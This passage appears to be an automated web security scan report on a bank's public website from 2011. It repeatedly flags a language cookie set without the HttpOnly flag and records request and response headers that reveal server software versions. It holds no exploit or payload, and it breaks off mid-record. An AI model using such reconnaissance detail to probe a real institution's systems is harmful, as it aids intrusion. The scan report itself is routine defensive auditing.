HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:04 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 53422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/help-me-choose-gateway.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:03 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 23849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/order-checks.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:03 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 23079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial-banking/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 197
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer-service/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /everyday-points/terms-and-conditions.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:30 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 30789
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_objCommonHeader_mSe ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /greensense/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:41 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/find-your-fit.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:17:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com/home-equity/help-me-choose-home-equity.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/lines.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:31 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 45072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity/loans.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:20 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:17 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 39896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/compare.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:15 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 32240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:17 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 41632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/home-equity.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:16 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 22861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /moneyhelp/?WT.ac=moneyhelp HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:22 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19797
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:32 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 50083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:21 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 50083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/home-refinance.aspx?WT.ac=refinance HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:32 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 20706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:25 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 22758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/faq.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:17 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 59861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/mobile-banking/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 212
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2> </bo ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/olbdemo.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
